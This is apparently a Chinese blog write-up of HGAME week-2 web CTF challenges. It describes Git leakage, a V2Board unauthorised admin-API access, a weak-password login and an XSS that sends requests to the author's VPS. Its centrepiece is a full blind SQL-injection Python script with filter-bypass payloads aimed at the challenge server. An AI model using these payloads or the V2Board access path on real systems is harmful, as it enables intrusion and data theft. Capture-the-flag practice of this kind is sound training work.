Git Leakage

Githack一波带走,下载得到flag

v2board

搜索得知V2Board存在越权漏洞,随便注册个账号拿到authorization

访问/api/v1/admin/user/fetch?pageSize=10&current=1

拿到token值,hgame{39d580e71705f6abac9a414def74c466}

Search Commodity
弱口令爆破得到密码admin123,登录进去是一个搜索框,很明显是sql注入,bp构造一个
search_id=1$select$*2,fuzz一下,发现好多都被过滤为空,这里给出部分

这里发现大写能够绕过过滤,我们写一个盲注脚本

import requests

import string

strs = string.printable

headers = {

    'Cookie': 'SESSION=MTY3MzY2MDExM3xEdi1CQkFFQ180SUFBUkFCRUFBQUpQLUNBQUVHYzNSeWFXNW5EQVlBQkhWelpYSUdjM1J5YVc1bkRBZ0FCblZ6WlhJd01RPT18adCvaHER65QoUwkQqK1elOtFjUAT9stHSgpZfPrUWik='

}

flag = ''

def attack(url):

    global flag

    for i in range(1, 100):

        for j in strs:

            if j == '%':

                continue

            tmp = ord(j)

            payload = 'DATABASE()'

            payload1 = 'SELECT(GROUP_CONCAT(TABLE_NAME))FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA)like(DATABASE())'

            payload2 = "SELECT(GROUP_CONCAT(COLUMN_NAME))FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME)like('5ecret15here')"

            payload3 = 'SELECT(f14gggg1shere)FROM(5ecret15here)'

            data = {

                'search_id': f"0||((ascii(substr(({payload3}),{i},1)))like({tmp}))"

            }

            r = requests.post(url, data=data, headers=headers)

            if 'hard disk' in r.text:

                flag += j

                print(flag)

                break

        if flag.endswith('}'):

            break

if __name__ == '__main__':

    url = 'http://week-2.hgame.lwsec.cn:32034/search'

    attack(url)
最后flag为:hgame{4_M4n_WH0_Kn0ws_We4k-P4ssW0rd_And_SQL!}
Designer
附件下载下来是一套js源码,看index.js,/user/register伪造ip无果,应该是xss

我们写一个xhr请求,让本地来访问就能成功伪造ip,得到true flag

利用在线xss_platform,把代码丢里头,Box shadow里填入xss攻击payload,注意这里要闭合下标签,
这里有个坑,得先preview一下再share,才能触发本地访问,不知道是不是就我一个人有这个问题

最后我们在vps的web日志里找到请求信息,本想直接输出来着,但没成功

jwt解密得到flag

最新文章

  1. mac上用teamviewer远程windows输入问题
  2. 【代码笔记】iOS-和当前时间比较
  3. Oracle中的自动增长字段
  4. Linux分区介绍
  5. ACM题目————还是畅通工程
  6. pyMagic:用python控制的Geek入门神器
  7. BitNami一键安装Redmine(转)
  8. replace 全局替换 和 数组去空
  9. SQL Server 2008 - Cannot set a credential for principal 'sa'.
  10. Sql Sever语句 (续2)
  11. 【shell脚本练习】判断用户存在和用户类型
  12. OpenGL之shader着色器的应用,三色渐变的三角形
  13. Spring Security(二):一、Preface(前言)
  14. webpack 配置 publicPath的理解
  15. [sklearn] 官方例程-Imputing missing values before building an estimator 随机填充缺失值
  16. hihoCoder.1509.异或排序(位运算 思路)
  17. js数组与字符串之间的相互转换
  18. css设置:图片文字等不能被选择
  19. Golang入门教程(一)GOPATH与工作空间(Windows)
  20. Standard NSD file

热门文章

  1. Winform控件绑定数据
  2. day22-web开发会话技术04
  3. 解决win7设置默认程序打开方式失效
  4. nginx-1.22.0版本安装
  5. Python requests 上传文件(以上传图片为例)
  6. Kubernetes(k8s)存储管理之数据卷volumes(二):hostPath数据卷
  7. (小白向)2020-12-18 中国大学MOOC第十二讲-动态变量应用
  8. python安装与初识
  9. 快速排序算法实现 (y总课后)
  10. 希腊字母表及latex代码